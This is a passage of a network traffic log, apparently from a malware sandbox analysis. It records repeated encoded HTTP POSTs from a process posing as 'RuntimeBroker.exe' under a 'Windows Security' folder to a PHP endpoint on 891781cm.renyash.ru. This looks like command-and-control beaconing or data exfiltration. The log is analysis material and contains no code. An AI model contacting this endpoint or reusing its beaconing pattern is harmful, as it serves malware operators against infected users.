                                                                                                                          39192.168.2.449780104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:34.648734093 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:35.006320000 CET1056OUTData Raw: 55 51 58 55 5a 5d 51 58 55 5a 54 59 51 5a 55 50 58 58 5c 59 59 50 52 5c 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UQXUZ]QXUZTYQZUPXX\YYPR\][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ )?.!+=[%==\(>0$4&:$X$?'??8.=>'=,#^!'^)#
                                                                                                                          Jan 1, 2025 04:22:35.100826025 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:35.374996901 CET806INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:35 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5FYJE6Hp656hxJP%2BZ2MFYEygle%2B0t8rYmlVYlfYJ0k91zdLwsOaQscmUb4k99C2mZko8xbJJuI6VDIxgOFBqXPPn7va4ThPsyy9EMeSa%2F2mnaX6S%2BtylEQVN18NV3o41ldj32VFe"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62c11c4d0cc4-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4465&min_rtt=1630&rtt_var=6281&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=60057&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          40192.168.2.449781104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:35.507778883 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:35.866558075 CET1056OUTData Raw: 55 56 58 56 5a 57 54 58 55 5a 54 59 51 52 55 57 58 53 5c 5b 59 55 52 52 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UVXVZWTXUZTYQRUWXS\[YURR][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ^+,* (=$=!).00=:0/2',/=(+X;*,#^!'^)
                                                                                                                          Jan 1, 2025 04:22:35.969257116 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:36.141941071 CET807INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:36 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B6m5ESjYHvnjvRU1vL9Bat1HFdxdhnirUqHBWgrN9X%2BAux2JEgdBzpxiyXkXOrxAYgASK9RW7qzUAX4BhrpgZLkLOPW1fGlEcq7Dcx5uhyzXX%2F6fuKCKRVLcNS%2FqFY%2BuJhJnvbst"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62c68f7ff793-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3085&min_rtt=1500&rtt_var=3734&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=102911&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          41192.168.2.449782104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:36.764602900 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:37.115413904 CET1056OUTData Raw: 55 51 5d 57 5f 5a 51 58 55 5a 54 59 51 59 55 51 58 53 5c 54 59 50 52 59 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UQ]W_ZQXUZTYQYUQXS\TYPRY][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#(5Z4;)_&.&=- 3-,'70/'#--+?')#^!'^)/
                                                                                                                          Jan 1, 2025 04:22:37.218152046 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:37.471946001 CET802INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:37 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SV3ZMmDbx9hkUlJxcLHYl6kPgLk4l%2BQKuK3ykndfyctxLlvq4a9ZEXAAI%2FCB0x8qISvohn6PXphaXzAzHtczUHdTdwM4BGKSvcbIcBLwBBxGTrzsQpbqiWVqDRkKudiXbN6hpnPg"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62ce5ec7c354-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3510&min_rtt=1642&rtt_var=4351&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=88026&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          42192.168.2.449783104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:36.764686108 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1780
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:37.115516901 CET1780OUTData Raw: 55 52 5d 54 5f 5b 54 5a 55 5a 54 59 51 5e 55 55 58 5d 5c 5c 59 55 52 5d 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UR]T_[TZUZTYQ^UUX]\\YUR]][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ +24;9_2>5\=.$$),$4'/6Q038. Z+=8U(<#^!'^)3
                                                                                                                          Jan 1, 2025 04:22:37.208295107 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:37.467854977 CET957INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:37 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mBMXDrLlxd9gfShpH8aDYdexz9Y3etGahSkTfXiwfUOd71wVyKgyxH1AEERIQYcv%2Fx%2BYyKuL%2BNlupdgqUfYCjxc0HeZU8S8n2rANlQOWV6WK03SQNW359Cuz8usBalK2%2BIn%2BbxQp"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62ce4a7f0c84-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4561&min_rtt=1719&rtt_var=6329&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2124&delivery_rate=59694&cwnd=149&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 22 50 30 38 2b 59 28 2e 25 01 2c 11 3c 0f 31 01 07 05 27 0e 02 12 26 3d 3d 15 3a 06 30 1e 3c 05 0e 03 32 14 03 5b 20 31 25 01 32 36 2e 5d 04 1d 25 59 3f 3a 00 5c 2b 06 35 59 3d 0c 0e 1b 33 34 34 03 26 1d 38 13 27 04 3e 59 35 31 27 55 25 33 23 0f 2b 29 3b 5f 33 3e 39 09 20 00 2e 57 0d 12 22 51 26 10 13 54 2a 0f 28 53 36 3f 3b 1c 30 01 01 54 33 2c 0a 12 20 01 36 1f 3e 2c 3c 5d 21 19 00 09 27 29 2f 58 21 39 03 5a 22 23 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98"P08+Y(.%,<1'&==:0<2[ 1%26.]%Y?:\+5Y=344&8'>Y51'U%3#+);_3>9 .W"Q&T*(S6?;0T3, 6>,<]!')/X!9Z"#"T /T=VO0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          43192.168.2.449784104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:37.601943970 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1048
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:22:37.959294081 CET1048OUTData Raw: 50 56 5d 53 5a 5d 51 5e 55 5a 54 59 51 5b 55 51 58 5c 5c 5a 59 51 52 59 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PV]SZ]Q^UZTYQ[UQX\\ZYQRY][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ (<5\4&1>''B"Q,4%,2',,8]?='),#^!'^)7
                                                                                                                          Jan 1, 2025 04:22:38.064678907 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:38.230387926 CET806INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:38 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kfvVALl8J1dv2uoS5mSU608Xp0niKRzlFNE%2BbcLcuz4kr3pqJTjGbOazf7X6MIZ3WKFUK7%2Br%2BE6fUWclz2zCimxqgqocTfhlNqs1pXW9vOCaSXB%2FmgJUtTIhEdab4sduZRsj1l0u"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62d39aa343f3-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3466&min_rtt=1718&rtt_var=4140&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1368&delivery_rate=92975&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          44192.168.2.449785104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:38.351362944 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:22:38.709182024 CET1056OUTData Raw: 55 56 5d 57 5a 56 51 5f 55 5a 54 59 51 5f 55 57 58 5c 5c 55 59 57 52 5c 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UV]WZVQ_UZTYQ_UWX\\UYWR\][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ]+<2#;2=6*,0U,'40/&//X,4Z+<)#^!'^)7
                                                                                                                          Jan 1, 2025 04:22:38.835601091 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:39.094384909 CET805INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:39 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jxGzwO079oeknwEL%2BRA6j3cSbkUujPHY%2F15eQyibOLd3DQddENDveRmlFw254j2AJel7s3AHqzFT%2BDoA6nafXwH0JuAdJmTUadutKiCJ08LGrFdAmha6kH55EoVE1QpD2ZK9pskj"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62d86f6f8c15-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3341&min_rtt=2022&rtt_var=3397&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1376&delivery_rate=116057&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          45192.168.2.449786104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:39.226289034 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:39.584395885 CET1056OUTData Raw: 55 56 58 54 5a 5e 51 54 55 5a 54 59 51 5a 55 55 58 5b 5c 59 59 53 52 5b 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UVXTZ^QTUZTYQZUUX[\YYSR[][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ +/*#;*&-=[)34!,$;$*$< /,^?>3>#^!'^)#
                                                                                                                          Jan 1, 2025 04:22:39.693404913 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:39.955635071 CET809INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:39 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rV1JrhMNJzzsEHNRmKiQah6LrNWtrUp6PJla%2BN%2F0IsHG6U63bdcoX9d0bU%2BqE6GMCfRuJjfwcD3Oz7hyV2%2FufGXJP0mFFCTTlyc3yK1hXOYlOMD%2BjkE0yTlEePJXaUJ11S7irDN9"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62ddcc3042d5-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3225&min_rtt=1717&rtt_var=3660&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=105942&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          46192.168.2.449787104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:40.086086988 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:40.443707943 CET1056OUTData Raw: 50 54 58 51 5a 58 51 54 55 5a 54 59 51 5c 55 53 58 5d 5c 5c 59 5d 52 5e 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PTXQZXQTUZTYQ\USX]\\Y]R^][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#(?-#;1$.*.+_3$9:$<X'?'Z8/=<]<;><#^!'^)
                                                                                                                          Jan 1, 2025 04:22:40.540417910 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:40.816406012 CET806INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:40 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YsxmCQhSBtxy%2B79uoKqEWiEpOX0BlEQ5NfMaNYbAZjHDEcuKubHzPU7Yuuwh1o0J4v5iyVvyFAn9iyQYyknVTC4q0SbusZKFdfUZxSVRIWUHtR%2BqSF4uwsfnQ5tQP8C%2BFy%2FfI1ZE"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62e31940c336-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4263&min_rtt=1662&rtt_var=5825&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=64972&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          47192.168.2.449788104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:40.946154118 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:41.303076982 CET1056OUTData Raw: 55 50 5d 57 5f 5d 54 5a 55 5a 54 59 51 59 55 50 58 58 5c 5e 59 57 52 52 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UP]W_]TZUZTYQYUPXX\^YWRR][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#?5722>"(>&4W.$0?*U'?'/><;)#^!'^)/
                                                                                                                          Jan 1, 2025 04:22:41.390074968 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:41.581012011 CET813INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:41 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I7SmK2PFVCFvz7o%2BP4kZJqMlB7v6s0N%2BHrKrzQHXL3hUP%2FHaRhcnMxPvmSFDIwzj1Qry5hTzWr1O7qVfstwp7H68rQihJ1US7TSgR%2F6gkv373Ehi%2Bu%2BCNxVveJyrNpR%2BVozEgZJO"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62e869d00ca8-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2194&min_rtt=1585&rtt_var=1814&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=225866&cwnd=158&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
